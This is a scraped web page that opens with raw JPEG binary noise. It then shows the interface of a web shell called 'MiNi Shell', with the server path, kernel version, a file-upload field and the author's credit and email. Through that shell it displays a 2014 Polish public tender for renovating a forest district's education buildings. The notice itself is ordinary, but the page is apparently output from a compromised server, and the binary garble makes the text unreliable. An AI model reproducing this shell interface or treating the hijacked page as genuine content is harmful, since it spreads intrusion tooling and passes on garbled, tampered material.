JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140915/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140915/196163-N-2014.html

<p class="kh_header"><b>Giby: Przystosowanie  Zielonej Klasy do funkcji szkoleniowo - prezentacyjnych</b><br>
<b>Numer ogłoszenia: 196163 - 2014; data zamieszczenia: 15.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe reprezentujące Skarb Państwa Nadleśnictwo Głęboki Bród , Głęboki Bród 4, 16-506 Giby, woj. podlaskie, tel. 087 5165203, 5165231, faks 087 5165203, 5165231.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_bialystok/nadl_gleboki_brod/zamowienia_publiczne</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa jednostka organizacyjna nie posiadająca osobowości prawnej - PGL LP.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przystosowanie  Zielonej Klasy do funkcji szkoleniowo - prezentacyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Przystosowanie Zielonej Klasy do funkcji szkoleniowo - prezentacyjnych.
Wspólny Słownik Zamówień: 45262690-4 - Remont starych budynków, 45453000-7 - Roboty remontowe i renowacyjne, 45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne, 45310000-3 - Roboty instalacyjne elektryczne, 45340000-2 - Instalowanie ogrodzeń, płotów i sprzętu ochronnego, 45112210-0 - Usuwanie wierzchniej warstwy gleby, 45112723-9 - Roboty w zakresie kształtowania placów zabaw, 39112000-0 - Krzesła, 39121200-8 - Stoły, 39711130-9 - Chłodziarki, 39721100-3 - Urządzenia do gotowania używane w gospodarstwie domowym, 39141400-6 - Kuchnie do zabudowy 
Stan budynków i opis: 
1. Budynek edukacyjny nr 1 - budynek drewniany o konstrukcji szkieletowej obitej
    deskami na zakład w pionie, posadowiony na stopach betonowych, dach 
    konstrukcji drewnianej  jętkowy dwuspadowy pokryty blachą dachówko-podobną,
    stolarka wrota drewniane deskowe, podłoga drewniana z desek na ostro ułożona
    na legarach drewnianych posadowionych na słupkach z bloczków betonowych, 
    wyposażony w instalację elektryczną oświetleniową. Stan budynku dobry. Obiekt 
    użytkowany do 1999 r. jako obiekt gospodarczy. Od roku 2000 do 2011
    wykorzystywany jako obiekt pomocniczy w zagospodarowaniu turystycznym.
2. Budynek edukacyjny nr 2 - budynek o konstrukcji z bali drewnianych,  
    posadowiony na fundamencie betonowym, strop z belek drewnianych z ułożoną    
    podłogą drewnianą z desek na ostro, dach konstrukcji drewnianej jętkowej 
    dwuspadowy  pokryty blachą dachówko-podobną, stolarka okienna okna ościeżnicowe
    i krosnowe, stolarka drzwiowa drzwi deskowe, posadzka betonowa, wyposażony 
    w instalację elektryczną oświetleniową, wodociągowo-kanalizacyjną, ciepłej 
    wody z przepływowego podgrzewacza, oraz kominek na drewno. Obecnie w 
    budynku znajdują się pomieszczenia zielonej klasy z aneksem kuchennym, 
    drwalka i sanitariaty. Stan budynku dobry. Obiekt użytkowany do 1999 r. jako 
    obiekt gospodarczy. Od roku 2000 do 2011wykorzystywany jako obiekt 
    pomocniczy w zagospodarowaniu turystycznym. Prace związane z 
    przystosowaniem obiektu do zagospodarowania turystycznego zostały 
    wykonane w roku 2000.
3. Wiata turystyczna - wiata konstrukcji drewnianej słupowej posadowiona na
    stopach betonowych, dach jętkowym dwuspadowym pokryty wiórem osikowym.
    Wyposażona w instalacje elektryczną oświetleniową, oraz stoły i ławy z drewna
    osikowego turystyczne. Stan średni. Wiata jest obiektem pomocniczym w
    zagospodarowaniu turystycznym i nie jest ujęta jako środek trwały.
4. Studnia kopana - studnia kopana z kręgów betonowych średnicy 1000mm
    głębokości 7,00 m, przykryta zadaszeniem drewnianym. Stan średni. Obiekt 
    jako pomocniczy towarzyszący niezbędny przy eksploatacji budynku mieszkalnego, 
    który znajduje się na działce.
5. Ogrodzenie - ogrodzenie drewniane z sztachet na słupkach żelbetowych 
    osadzonych w gruncie wraz z cokołem betonowym. Stan średni. Obiekt 
    jako pomocniczy towarzyszący niezbędny przy eksploatacji budynku 
    mieszkalnego, który znajduje się na działce.
Planowane roboty budowlane do wykonania:
1. Budynek edukacyjny nr 1:
    - wzmocnienie fundamentów betonowych
    - wykonanie termoizolacji z wełny mineralnej
    - wykonanie docieplenia podłogi 
    - wykonanie oblicowania ścian wewnątrz z drewna po wykonaniu docieplenia
    - wykonanie modernizacji okładziny i oblicowania elewacji
    - wykonanie kanalizacji deszczowej
    - wykonanie drzwi wewnętrznych i zewnętrznych (podwójne)
    - wykonanie instalacji elektrycznej wraz z konstrukcją wsporczą pod oświetlenie i
      nagłośnienie.
2. Budynek edukacyjny nr 2:
    - przebudowa stropu, schody wewnętrzne, wykonanie nowych otworów
    - przemurowanie kominka
    - przebudowa sanitariatów z dostosowaniem na większą ilość osób
    - przeniesienie aneksu kuchennego w miejsce drwalki wraz z termoizolacją
    - ścianki działowe, okładziny ścian, podłóg
    - wymiana i rozbudowa instalacji elektrycznej wraz z osprzętem
    - wymiana i rozbudowa instalacji wod-kan wraz z osprzętem
    - wstawienie stolarki okiennej i drzwiowej w nowych otworach
3. Wiata turystyczna:
    - rozbiórka konstrukcji wiaty wraz z demontażem stóp betonowych i pokryciem
    - ponowny montaż konstrukcji wiaty w innym miejscu wraz z stopami betonowymi
    - wykonanie nowego pokrycia wiaty wiórem sosnowym
4. Studnia kopana:
    - remont ocembrowania studni
    - wykonanie drewnianej obudowy studni wraz z zadaszeniem
5. Ogrodzenie:
    - demontaż częściowy ogrodzenia z sztachet wraz z słupkami żelbetowymi i 
      cokołem betonowym
    - wykonanie nowego ogrodzenia z sztachet wraz z cokołem betonowym w innym
      miejscu
6. Przystosowanie placu zabaw z wyznaczeniem miejsc postojowych usytuowane
    pomiędzy drogą leśna (dojazd pożarowy nr 4, a ogrodzeniem :
    - zdjęcie warstwy humusu i zagęszczenie podłoża 
    - wykonanie podbudowy z kruszywa naturalnego i zagęszczenie
    - wykonanie  nawierzchni z kruszywa naturalnego z domieszką 50% kamienia 
      łamanego i zagęszczenie 
Sposób użytkowania budynków objętych dofinansowaniem:
Budynki w przeszłości były użytkowane jako budynki pomocnicze w zagospodarowaniu turystycznym. Od 2012 roku są one użytkowane jako obiekt edukacyjny.  Przeprowadzane są zajęcia z różnymi grupami odbiorców ale jedynie sezonowo.
Powierzchnia zabudowy budynków:
1. Budynek edukacyjny nr 1 (stodoła) - 85,91 m2
2. Budynek edukacyjny nr 2 (budynek gospodarczy) - 53,34 m2 
3. Wiata turystyczna - 65,00 m2
Powierzchnia utwardzenia placu zabaw o powierzchni 700 m2 w tym wyznaczone miejsca postoju o powierzchni 195 m2
Ilość miejsc postojowych:
Planuje się przygotowanie 10 miejsc dla samochodów osobowych.
Szczegółowy opis robót opisany został w projektach wykonawczym, branża budowlana, sanitarna i elektryczna, szczegółowym przedmiarze robót, oraz specyfikacjach technicznych wykonania i odbioru robót.
Dodatkowe warunki dotyczące przedmiotu zamówienia:
- wymagany minimalny okres gwarancyjny - 36 miesięcy
Zamawiający nie dopuszcza składania ofert równoważnych
Zamawiający nie dopuszcza składania ofert wariantowych.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.26.26.90-4, 45.45.30.00-7, 45.33.00.00-9, 45.31.00.00-3, 45.34.00.00-2, 45.11.22.10-0, 45.11.27.23-9, 39.11.20.00-0, 39.12.12.00-8, 39.71.11.30-9, 39.72.11.00-3, 39.14.14.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości: 9 500.00 PLN (słownie:  dziewięć tysięcy pięćset  00/100 PLN)
Wadium należy wnieść w terminie do dnia 2014-09-30 do godz. 10:00</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek nie będzie oceniany</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Wykonawca musi wykazać, że zrealizował (rozpoczął i zakończył) w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 (trzy) roboty budowlane odpowiadające swoim rodzajem i o wartości nie mniejszej niż 390 tys. złotych z podatkiem VAT każda, robotom budowlanym stanowiącym przedmiot zamówienia (prace remontowo-odtworzeniowe na budynkach drewnianych). Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek nie będzie oceniany</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Wykonawca wskaże do wykonania niniejszego zamówienia osobę spełniającą określone wymagania:
kierownik budowy, posiadający uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalności konstrukcyjno - budowlanej - 5 lat na stanowisku kierownika budowy. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej.
a. wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - dysponowanie środkami finansowymi lub zdolnością kredytową w wysokości minimum 390 tys. zł,
b. są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę co najmniej 390 tys. zł.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz części zamówienia, której wykonanie wykonawca zamierza powierzyć podwykonawcom</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_bialystok/nadl_gleboki_brod/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Głęboki Bród, Głęboki Bród 4, 16-506 Giby, pokój nr 7 - transport.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.09.2014 godzina 10:00, miejsce: Nadleśnictwo Głęboki Bród, Głęboki Bród 4, 16-506 Giby, pokój nr 4 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Europejski Fundusz Rybacki, Program Operacyjny Zrównoważony rozwój sektora rybołóstwa i nadbrzeżnych obszarów rybackich 2007 - 2013, oś priorytetowa 4 - Zrównoważony rozwój obszarów zależnych od rybactwa, w ramach Środka, 4.1. Rozwój obszarów zależnych od rybactwa z wyłączeniem realizacji operacji polegających na funkcjonowaniu lokalnej grupy rybackiej (LGR) oraz nabywaniu umiejętności i aktywacji lokalnych społeczności.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com